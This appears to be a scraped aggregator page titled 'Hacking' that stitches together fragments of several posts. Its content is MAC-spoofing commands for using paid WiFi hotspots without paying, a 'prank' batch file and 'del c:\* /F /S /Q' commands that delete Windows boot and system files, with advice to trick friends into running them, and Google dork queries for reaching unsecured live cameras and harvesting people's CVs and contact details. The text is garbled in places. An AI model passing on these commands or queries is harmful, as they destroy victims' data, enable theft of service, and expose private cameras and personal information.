background preloader

Hacking

Facebook Twitter

Hack any paid WiFi hotspot in about 30 seconds. (The above video was banned from YouTube on 9/12/2014 and hence has been re-uploaded to Vimeo. No explanation for the ban was given. The original YouTube video identifier was: Agodg3dmwaQ ). Or rather, DON'T hack any paid WiFi hotspots, as that would be bad... Also, don't turn your WiFi card off and then back on again after the hack to rectify any MAC address conflicts that might arise.

The commands are: ifconfig en1 | grep ether arp -a sudo ifconfig en1 ether [mac address to spoof] Note that the term "MAC address" has nothing to do with Macintosh computers. Painful Computer Pranks. Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. 2.

Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q 3. 1. 2. 3. How to Use Google for Hacking. Google serves almost 80 percent of all the search queries on the Internet, proving itself as the most popular search engine. However, Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed.

In this post, you will find the information on how to use Google for exploiting security vulnerabilities that exists within many websites. The following are some of the ways to use Google for hacking: 1. There exists many security cameras that are used for monitoring places like parking lots, college campus, road traffic etc. Inurl:”viewerframe? Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. As you can see in the above screenshot, you now have access to the Live cameras which work in real-time. Intitle:”Live View / – AXIS” 2. Intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” 3. . “? Hackaday — Fresh hacks every day.